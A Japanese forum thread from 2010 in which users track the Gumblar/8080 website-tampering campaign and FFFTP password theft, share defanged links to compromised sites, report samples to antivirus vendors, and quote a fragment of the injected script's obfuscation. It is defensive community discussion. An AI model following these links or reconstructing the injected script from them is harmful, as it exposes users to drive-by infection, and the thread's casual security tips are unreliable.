もしくはソフト本体側に埋め込まれた共通鍵だけだからデバッガ使って解析されたらばれる
暗号化っていうよりエンコードに近い
274:名無しさん@お腹いっぱい。
10/01/30 19:04:10
そかーネットがめんどくさいものになってきたな
275:名無しさん@お腹いっぱい。
10/01/30 19:15:30
>206
一昨年
276:名無しさん@お腹いっぱい。
10/01/30 19:18:57
>>261
McAfee送信完了
277:名無しさん@お腹いっぱい。
10/01/30 19:29:18
>>261
avastにチェストから送信しました
278:名無しさん@お腹いっぱい。
10/01/30 19:30:43
>>270
オープンソースだから誰にでも分かる
279:名無しさん@お腹いっぱい。
10/01/30 19:32:48
オープンソースだから暗号化の部分だけ書き換えて使うって手もある
280:名無しさん@お腹いっぱい。
10/01/30 19:35:18
WinSCPダウンロードしに行ったらソースも公開されてるみたいだね
そのうちやられるんじゃないか?
281:名無しさん@お腹いっぱい。
10/01/30 19:51:03
パスワードを保存するとかそういうのは全部アウトじゃねーの
パスワードデータベースをパスワードで保護するとかしないといかんな
282:名無しさん@お腹いっぱい。
10/01/30 20:02:02
脳に保存しとけばいいだろ
283:名無しさん@お腹いっぱい。
10/01/30 20:03:52
>>281
そうみたい
パスワードを保存するのが危険だって
感染実験してみた人が書いてた
FFFTP以外にもメジャーどころは情報盗まれたみたいだよ
284:名無しさん@お腹いっぱい。
10/01/30 20:08:42
マジかFFFTP・・
しかし毎回パスワード打つようにしてもキーロガー仕込まれてたら
意味無いのですよね
285:名無しさん@お腹いっぱい。
10/01/30 20:10:13
トークン使え
286:名無しさん@お腹いっぱい。
10/01/30 20:17:31
その為にプロセスコントロールでKBを監視するのが最近の流行
287:名無しさん@お腹いっぱい。
10/01/30 20:20:35
WinSCPで鍵認証の俺に隙はなかった
・・・けど秘密鍵まで持ってかれたらアウトだよな
288:へたれ発掘屋
10/01/30 20:22:40
朝日オート(最新型)*再々改竄*
URLリンク(horizon)<)●net/2007/10
最新型が釣れないよ・・・ orz
289:名無しさん@お腹いっぱい。
10/01/30 20:27:07
>>288
<script>タグをコメントアウトしてるのは何でだろう?
管理者のとりあえずの処置?
それとももともと?
290:名無しさん@お腹いっぱい。
10/01/30 20:37:20
あれ、こないだもコメントアウトしてる所なかったか
291:名無しさん@お腹いっぱい。
10/01/30 21:42:49
キーロガーって、叩いた順番を覚えてるだけであって、
パケそのものを盗ってるわけじゃないんでそ?
だったら、短文登録しておいて、たとえば「パ」→「pass」みたいに
変換して使えばバレなくない?
あとは、1文字おきに打って、マウスでカーソル動かして残りを
埋めるような形でパス打つとか。
上の例だと「ps」→「pas」→「pass」
292:45
10/01/30 21:45:22
>>261
めるぽ
293:名無しさん@お腹いっぱい。
10/01/30 21:45:38
馬鹿がいる・・・
294:名無しさん@お腹いっぱい。
10/01/30 22:17:38
ニュー速に貼られてたコレは?
://kasim●kashima136●com/z19z00703/?link/news/ffftp●html
295:名無しさん@お腹いっぱい。
10/01/30 22:26:39
>>294
スレリンク(sec板:253-番)
296:名無しさん@お腹いっぱい。
10/01/30 22:26:46
>>288
そこの中古車屋は修復してまた改竄なの?それとも放置なの?
297:名無しさん@お腹いっぱい。
10/01/30 22:27:01
> 253で貼られて叩かれてますが
298:名無しさん@お腹いっぱい。
10/01/30 22:45:52
普段Fedora+Firefoxでブラウジング、サイト更新時は
CMSを使っている俺に隙はなかった
みんな無理せずに出来の悪いOS投げ捨ててこっちにおいでよ
PDF閲覧ソフト・Flash再生ソフト・Java?なにそれおいしいの?
プロプライエタリの塊なんぞ最初からノーサンキューです
299:名無しさん@お腹いっぱい。
10/01/30 22:46:51
へぇ そいつぁすげぇや
300:45
10/01/30 22:52:01
>>288
上:くこから URLリンク(f00.jp)
下:めるぽ
301:名無しさん@お腹いっぱい。
10/01/30 23:01:46
>>295
>>297
すまん。
リンクあぼーんしてたんで見えてなかった。
302:名無しさん@お腹いっぱい。
10/01/30 23:04:13
>>285
個人でトークンって使えるものなの?
303:45
10/01/30 23:08:27
>>261
かすぺ
> Hello,
>
> index.htm_, index2.htm_, profile_index.htm_ - Trojan.JS.Redirector.at
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> The answer is relevant to the latest bases from update sources.
>
> Please quote all when answering.
> -----------------
> Regards, Baranov Artiom
> Virus Analyst, Kaspersky Lab.
304:45
10/01/30 23:18:05
前スレでめるしてたんだけど、最初っからフォームでいけばよかった。。。
>>288 上 対応の返事あり。404を確認。
305:へたれ発掘屋
10/01/30 23:23:15
>>296
朝日オートの件だが
改竄→無効化(コメントアウト)→再改竄・・・
というループを繰り返してる。
※最新型と1コ前の型の違いは「eval」の有無
306:へたれ発掘屋
10/01/30 23:39:44
>>304(45)
乙!!
そろそろ釣れるかな?
".replace(/\^|\$|@|\)ig," "eval("
307:名無しさん@お腹いっぱい。
10/01/31 01:22:03
>>16の
・Gumblar Checker 2
URLリンク(gumblarchecker.crz.jp)
が白紙になってるけど。死亡?
308:名無しさん@お腹いっぱい。
10/01/31 01:25:15
>>307
1時間くらい前から、白紙になってるね。
309:名無しさん@お腹いっぱい。
10/01/31 02:07:16
アメリカ研究振興会
URLリンク(www)<)●com/index●html
大阪府中小企業団体中央会
URLリンク(www)●maido●or●jp/index0●html
どれもevalつき
310:名無しさん@お腹いっぱい。
10/01/31 03:15:11
>>298
たんにマイナーだから狙われないだけ
もしFedra+FirefoxがWindows+IEなみに普及してたらターゲットにされて攻撃されまくる
311:名無しさん@お腹いっぱい。
10/01/31 03:21:14
ここで逆転の発想
弄られる前にサイトを閉じる
312:名無しさん@お腹いっぱい。
10/01/31 03:24:47
Fedora(笑
Gentooだろ常識的に考えて
313:へたれ発掘屋
10/01/31 04:07:17
寝る前に投下・・・と。
サイト名省略w(きっと最新型)
URLリンク(www)<)
314:45
10/01/31 05:43:55 BE:3302137-2BP(1236)
>>309
めるぽ
めるぽ
めるぽ
>>313
めるぽ (スパム逝きの可能性大)
315:名無しさん@お腹いっぱい。
10/01/31 10:04:56
JRE6Update17での感染報告ってありますか?
イマイさんにリダイヤル攻撃されるんですね
316:名無しさん@お腹いっぱい。
10/01/31 10:14:11
GENOウイルスによる改ざんじゃなくてGENO自体がウィルス改竄している件
詳細はWikipediaの編集履歴を参照
317:名無しさん@お腹いっぱい。
10/01/31 10:55:21
新型はdocument.writeが無くなったんだね
318:名無しさん@お腹いっぱい。
10/01/31 11:45:05
gnome氏がキレてる
辞めてほしくないなあ
319:名無しさん@お腹いっぱい。
10/01/31 12:00:52
新型( >>309 >>313 )Dr.WEBで全機撃墜(JS.Redirector.2)。
普段あまり頼りにならんけど、8080引っかけたい人はどうぞ。
URLリンク(drweb.jp)
320:名無しさん@お腹いっぱい。
10/01/31 12:02:52
>>316
じゃあ業務停止命令されなきゃな
やはりGENOが去年からのウイルス騒動の元凶じゃないのか?
ガンブラー系や8080系作ったのもそいつらだって疑われて当たり前だ
321:geno
10/01/31 12:04:06
さくらってALFTP対応してる?
してるなら乗り換えたいな
322:名無しさん@お腹いっぱい。
10/01/31 12:32:56
>>318
ボランティアでやってるのにここまで求められちゃかなわん、と
ふくれているのかもしれんが、
「当該記事の修正を迫」った人への執拗なまでの当てこすりといい
「みんな助かってます、どうか止めないでください」との声が上がることを
期待しているかのようなあざとい誘い受けといい、ガキかよ、と。
そんなにやってらんないんなら止めりゃいいのに。誰も頼まないから。
323:名無しさん@お腹いっぱい。
10/01/31 12:38:26
フリーソフト作ってたりするとわかるけど
最近の一般ユーザーはマジキチ
324:名無しさん@お腹いっぱい。
10/01/31 12:41:05
わかるわ~
325:名無しさん@お腹いっぱい。
10/01/31 12:42:47
事情がよく分からんのだが、FFFTP作者本人からの抗議でもあったん?
それとも第三者なのか
326:名無しさん@お腹いっぱい。
10/01/31 12:44:28
みんな何の話してるの?Gumblar Checker?
327:名無しさん@お腹いっぱい。
10/01/31 12:46:37
カッカするのは分かるが、確かに
当て擦りっていうの?
あのしつこくてくどい皮肉めいた書きぶりは
ちょっと大人気ないわ
頭冷やして、このまま続けてくれとは思うけど
328:名無しさん@お腹いっぱい。
10/01/31 12:47:33
>>322
いやあ俺は助かってるからさ
そんなあてこすりは眼中にはいらないほど助かってるから
サイト持ってるから気持ちわかるところもあるし
彼の文体も好きなんだよね
329:名無しさん@お腹いっぱい。
10/01/31 12:48:29
>>326
gnomeさんとこ。
なんか誤解を与えかねない(?)記事があってクレームがきたみたい。
330:名無しさん@お腹いっぱい。
10/01/31 12:51:03
>>325
第三者だろ、曽田さんはそこまで暇じゃない
331:名無しさん@お腹いっぱい。
10/01/31 12:52:29
>>329
㌧。
332:名無しさん@お腹いっぱい。
10/01/31 12:55:21
GENOざまぁあああああああwwwwwww
333:名無しさん@お腹いっぱい。
10/01/31 12:59:45
>>330
だとしたら、それこそ「誤解を招く表現」だと思うんだけど
あれだと普通にSota氏から抗議がきたように読めちゃうんだが
334:名無しさん@お腹いっぱい。
10/01/31 13:01:09
>>333
お前みたいな反応をかえすやつといちいち付き合ってられん。
335:名無しさん@お腹いっぱい。
10/01/31 13:02:18
切れた第三者が曽田さんに謝れとか見当違いなことふっかけてきたんだろ
336:名無しさん@お腹いっぱい。
10/01/31 13:02:21
とりあえずおまいらソースを出してくれ
337:名無しさん@お腹いっぱい。
10/01/31 13:07:20
いや別に無理に付き合ってくれなくてもいいけど
ただ、あそこで誤解を招く表現の上塗りしちゃってどうすんの?と
俺がSota氏だったらああいう書かれ方はちょっと迷惑かなぁ、と
今まさにそういう煩わしさに巻き込まれているGnome氏なんだから
余計慎重になってほしかったな、と
338:名無しさん@お腹いっぱい。
10/01/31 13:07:26
人名出されても何のことかわからん
339:名無しさん@お腹いっぱい。
10/01/31 13:09:02
>>322
雑音って一度気にし始めるともうだめなんだよ
そればかりが気になってしょうがなくなる
どんな人でもそう
やめるやめないは本人の好きにすればいいが、お前のそのコメントはだめだな
こんなところでぬるま湯につかってるんだから
340:名無しさん@お腹いっぱい。
10/01/31 13:10:02
>>337
迷惑も何も本人はブログ以外ほとんどやってないんだから、迷惑もくそもないだろう
341:名無しさん@お腹いっぱい。
10/01/31 13:12:30
スゲー論理だなw
342:名無しさん@お腹いっぱい。
10/01/31 13:12:41
個人ブログなんだからいいじゃん
企業や報道機関が無知でいい加減な報道しても放置状態なのに
343:名無しさん@お腹いっぱい。
10/01/31 13:14:33
情弱「FFFTPの作者が悪いGENOが悪い」
344:名無しさん@お腹いっぱい。
10/01/31 13:14:53
真っ赤な顔して熱湯風呂入ってる人って大変ッスね
345:名無しさん@お腹いっぱい。
10/01/31 13:16:18
情弱が多くて大変だな
346:名無しさん@お腹いっぱい。
10/01/31 13:17:07
変な正義感ふりかざすやつが増えたよな、ご本人にかわってクレームつける
俺かっこいいとか
347:名無しさん@お腹いっぱい。
10/01/31 13:20:40
>>325
スレッドとか立ったなかった?
文章を一部抽出したような内容で。
348:名無しさん@お腹いっぱい。
10/01/31 13:25:20
ニュース速報あたりに立ってたな、普段ソースソースうるさいくせに
中途半端に引用された文章にくいついて盛り上がってた
349:名無しさん@お腹いっぱい。
10/01/31 13:31:02
よく分からんけど、
どこかで「FFFTPは危険!」みたいな注意喚起スレが立って、
gnome氏の記事が(氏の意図にそぐわない形で)部分引用された
↓
gnome氏の「FFFTP自体がマルウェア」とでも言いたげな記事を読んだ
(そう誤解した)第三者が
「FFFTP自体は悪くないだろ!記事を書き直せ!」とブログに凸した
↓
gnome氏、「お詫び」という形で、ささやかな反論
みたいな流れ?(んで、FFFTP作者のSota氏はこの件に絡んでいない)
350:名無しさん@お腹いっぱい。
10/01/31 13:32:34
中途半端な知識持ちって一番たちが悪いな・・・
351:名無しさん@お腹いっぱい。
10/01/31 13:34:28
誤解乙
終了!
352:名無しさん@お腹いっぱい。
10/01/31 13:37:26
まぁでもあの書き方だとオレも Sota さんからクレーム来たのかと普通に思っちゃうわ。
353:名無しさん@お腹いっぱい。
10/01/31 13:47:31
>>352
そうか?
それだけは無いなと読めたが
354:名無しさん@お腹いっぱい。
10/01/31 13:51:47
お前がそう思うんなら(ry
355:名無しさん@お腹いっぱい。
10/01/31 13:56:56
実はクレーム凸した人がこのスレに居るとか
356:名無しさん@お腹いっぱい。
10/01/31 13:57:25
FFFTPが悪いみたいに思い込んでる人が増えてるみたいだな
このスレにもいるし
初期の頃から分かってることだがその他のFTPクライアントも同様なのに
357:名無しさん@お腹いっぱい。
10/01/31 13:58:21
実はgnomeも(ry
358:名無しさん@お腹いっぱい。
10/01/31 13:58:28
最初に記事にしたアソコが悪い。
359:名無しさん@お腹いっぱい。
10/01/31 14:01:47
以前見たもっとまともな記事は
記憶したパスワードが盗まれる対象のソフトを複数あげてたな
サイトアドレスは記憶にないけど
360:名無しさん@お腹いっぱい。
10/01/31 14:12:00
ホームページビルダーもおわったな
361:名無しさん@お腹いっぱい。
10/01/31 14:17:31
突然で申し訳ないんだけど、
自分のサイトはヤフージオシティーズが提供している
ジオクリエーターで製作しているんだけど、
こういうタイプのサイトもGumblarや8080系のウイルスによって
改ざんされる事あるんですか?
アレ、PCから直接HTMLファイルや画像ファイルが開けて便利なんですけど
とっても心配です。
ちなみに使用ブラウザはIE8
アドビリーダーもフラッシュも最新版に更新済み
(Javaスクリプトはリーダーのみ切っている
IEはお絵かき掲示板使用の為切っていない)
362:名無しさん@お腹いっぱい。
10/01/31 14:21:03
Gnome使ってるけど、マジ意味わからん。
363:名無しさん@お腹いっぱい。
10/01/31 14:21:41
KDEつかおうぜ
364:名無しさん@お腹いっぱい。
10/01/31 14:24:29
いやいやLXDEで
365:名無しさん@お腹いっぱい。
10/01/31 14:28:09
つxfce
366:名無しさん@お腹いっぱい。
10/01/31 14:33:10
GUIなんて時代遅れ
367:名無しさん@お腹いっぱい。
10/01/31 14:33:18
gnomeのスルー力のなさというか、意外に耐性が低かったのに驚き。
ああいう口調や文体を使うってことは、そのあたりに相応の自負があってのものだと思っていたよ。
368:名無しさん@お腹いっぱい。
10/01/31 14:37:48
>>367
それはちょっと思った
本人が想定してたより,あのブログの影響力が大きくなりすぎてたのかもね
369:名無しさん@お腹いっぱい。
10/01/31 14:38:40
gnome最新版は勝手に文章を書くのか
370:名無しさん@お腹いっぱい。
10/01/31 14:44:17
>>369
ワロタww
371:名無しさん@お腹いっぱい。
10/01/31 14:51:56
>367
どうも初めてではないみたいだしな
耐性つくか脆くなるかで、Gnomeは後者なんだろう
ここは生ぬるく見守ろうぜ
372:名無しさん@お腹いっぱい。
10/01/31 15:00:51
ほびーちゃんねるって感染した?
URLリンク(hobby-channel.net)
見れないんだが
373:名無しさん@お腹いっぱい。
10/01/31 15:07:53
メンテでPHPやSQLが停まってるとかじゃね
374:名無しさん@お腹いっぱい。
10/01/31 15:08:06
Gnomeは去年のGENOの時も大量の馬鹿の特攻くらって愚痴ってなかったか?
毎度毎度大変だよな
375:名無しさん@お腹いっぱい。
10/01/31 15:09:17
>>374
Nifty感染疑惑の時かな
376:名無しさん@お腹いっぱい。
10/01/31 15:09:54
>>373
そうでしたか、すみません。
377:名無しさん@お腹いっぱい。
10/01/31 15:19:47
ガンブラーチェッカーは何で今見られないんだろ
378:名無しさん@お腹いっぱい。
10/01/31 15:22:17
このウィルスってロシア人が作ってるの?それとも日本人なの?
379:名無しさん@お腹いっぱい。
10/01/31 15:23:08
少なくとも日本人ではないな
380:名無しさん@お腹いっぱい。
10/01/31 15:24:11
大陸系
381:名無しさん@お腹いっぱい。
10/01/31 15:29:16
ブログのurlplz
382:名無しさん@お腹いっぱい。
10/01/31 15:43:18
チキンの日本人が作れるわけない
383:名無しさん@お腹いっぱい。
10/01/31 15:45:51
感染改竄されてる所って同じweb屋が請け負ってるんかな?
384:名無しさん@お腹いっぱい。
10/01/31 15:46:55
チカンの日本人に見えた
これもウイルスのせいか…
385:名無しさん@お腹いっぱい。
10/01/31 15:52:02
[2010/1/31]
有志の手により、パスワード漏れ対策版のFFFTPが公開されました。
386:名無しさん@お腹いっぱい。
10/01/31 15:55:52
その有志がウィルス作って・・・ゴクリ
387:名無しさん@お腹いっぱい。
10/01/31 15:56:52
さらに上はいるからな。
388:名無しさん@お腹いっぱい。
10/01/31 16:00:19
>>377
自分もなんだか心配だ
389:名無しさん@お腹いっぱい。
10/01/31 16:00:43
レジストリ完全消去ツールも発表とか、対応スゲーなあ
ボランティアなのに、有り難いことだ
390:名無しさん@お腹いっぱい。
10/01/31 16:02:07
まぁまたやられるんだけど
他の使っといたらいいよ。
391:名無しさん@お腹いっぱい。
10/01/31 16:03:37
>385
オープンソースの強みだな
もう乗り換えちゃったけど
392:名無しさん@お腹いっぱい。
10/01/31 16:04:26
>>383
そういうところもあるだろうし
違うところもあるだろう
393:名無しさん@お腹いっぱい。
10/01/31 16:06:21
>>391
強みでもあり、解析されるという弱みでもあり…ホント諸刃の剣だな
例のブログ、お詫び記事がお詫び記事に見えない件
394:名無しさん@お腹いっぱい。
10/01/31 16:11:56
ブログみてきた
Sota かわいそす
ってか FTPソフト 乗り換えるべきなんでしょうか?
395:名無しさん@お腹いっぱい。
10/01/31 16:12:35
FFFTP使っていてやられちゃうような人は
何使ってもやられるから気にすんな
396:名無しさん@お腹いっぱい。
10/01/31 16:14:58
>>394
乗り換えるべき
>>395
そんなことないね。
397:名無しさん@お腹いっぱい。
10/01/31 16:16:02
感染しなければどうと言う事は無い
398:名無しさん@お腹いっぱい。
10/01/31 16:17:30
不安がって騒ぐ人って、まず感染予防してるのかそっちのほうが心配
399:名無しさん@お腹いっぱい。
10/01/31 16:19:06
>>394
その前にちゃんと対策すれば大丈夫
400:名無しさん@お腹いっぱい。
10/01/31 16:23:11
>>394
心配ならOSをMacかLinuxに変えれ
Windows由来の脆弱性は突かれないから
401:名無しさん@お腹いっぱい。
10/01/31 16:25:25
まぁ騒いだおかげでFFFTP改善されたともとれるし結果オーライでね?
402:名無しさん@お腹いっぱい。
10/01/31 16:35:52 BE:603511946-PLT(12031)
GumblarChecker 2は色々な理由で現在停止されています、そのうち復活するかもしれません
ソースコードは公開してるので気が向いた人はそのまま使うなり改造するなりして使ってください、著作権は放棄しています
URLリンク(www.dotup.org)
403:名無しさん@お腹いっぱい。
10/01/31 16:46:59
windows9x系はどう対応すればいいの?
404:名無しさん@お腹いっぱい。
10/01/31 16:47:21
>>402
今までありがと。
405:名無しさん@お腹いっぱい。
10/01/31 16:47:33
PCを投げ捨てます
406:名無しさん@お腹いっぱい。
10/01/31 16:49:31
>>402
え?理由はよくわからないけど、感染してたの?
理由教えてほしいな・・・他の人も使ってただろうし・・・
407:名無しさん@お腹いっぱい。
10/01/31 16:54:27
>>403
プラグインでまだサポートのあるのは最新に
その他ははアンインスコ
ルータ噛ます
ブラウザは最新版でいまだに使えるOPERA10.10にする……とかかなぁ
そもそもこのスレで話題の奴は9xで感染拡大するのかわからんけど
408:名無しさん@お腹いっぱい。
10/01/31 16:56:20
ふむふむ。これが噂のPHPというやつか。
さっぱり分からん。
409:名無しさん@お腹いっぱい。
10/01/31 16:58:49
>>407
ありがとう
410:名無しさん@お腹いっぱい。
10/01/31 16:59:35
>>385
URLリンク(mag.matrix.jp)
この仕方がいまいち解らないんだけど
ソースとバイナリってのをFFFTPのフォルダーに入れるの?
誰か説明して下さい
お願いします。
やり方を1から10までお願いします。
411:名無しさん@お腹いっぱい。
10/01/31 17:02:21
> やり方を1から10までお願いします。
甘え過ぎだろw
412:名無しさん@お腹いっぱい。
10/01/31 17:03:03
>>410が管理してるサイトにはアクセスしたくないな
413:名無しさん@お腹いっぱい。
10/01/31 17:03:07
>>402
JavaScriptやcookieが不必要で使い勝手が良く、重宝しておりました。
いままで利用させていただき、大変ありがとうございました。
これからはaguse.jp使うしかないか。
414:名無しさん@お腹いっぱい。
10/01/31 17:06:05
>>412
違いますよ FFFTPを配布してるサイトのリンク先です><
URLリンク(www2.biglobe.ne.jp)
[2010/1/31]
有志の手により、パスワード漏れ対策版のFFFTPが公開されました。
マスターパスワードを使用することにより、FFFTPにパスワードを記憶させた時の安全性が向上しています。
以下のサイトです。改良&公開ありがとうございます。
にょろぷにらん・FFFTPパスワード漏れ対処版作ってみた
URLリンク(mag.matrix.jp)
415:名無しさん@お腹いっぱい。
10/01/31 17:07:19
えっ
416:名無しさん@お腹いっぱい。
10/01/31 17:12:56
>>414
バーカバーカ
417:名無しさん@お腹いっぱい。
10/01/31 17:13:01
w
418:名無しさん@お腹いっぱい。
10/01/31 17:13:54
>>416
本当に解らないんです><
419:名無しさん@お腹いっぱい。
10/01/31 17:15:08
日本語も読めないのか‥‥‥
420:名無しさん@お腹いっぱい。
10/01/31 17:16:45
1から10まで必要ないだろ
4までで十分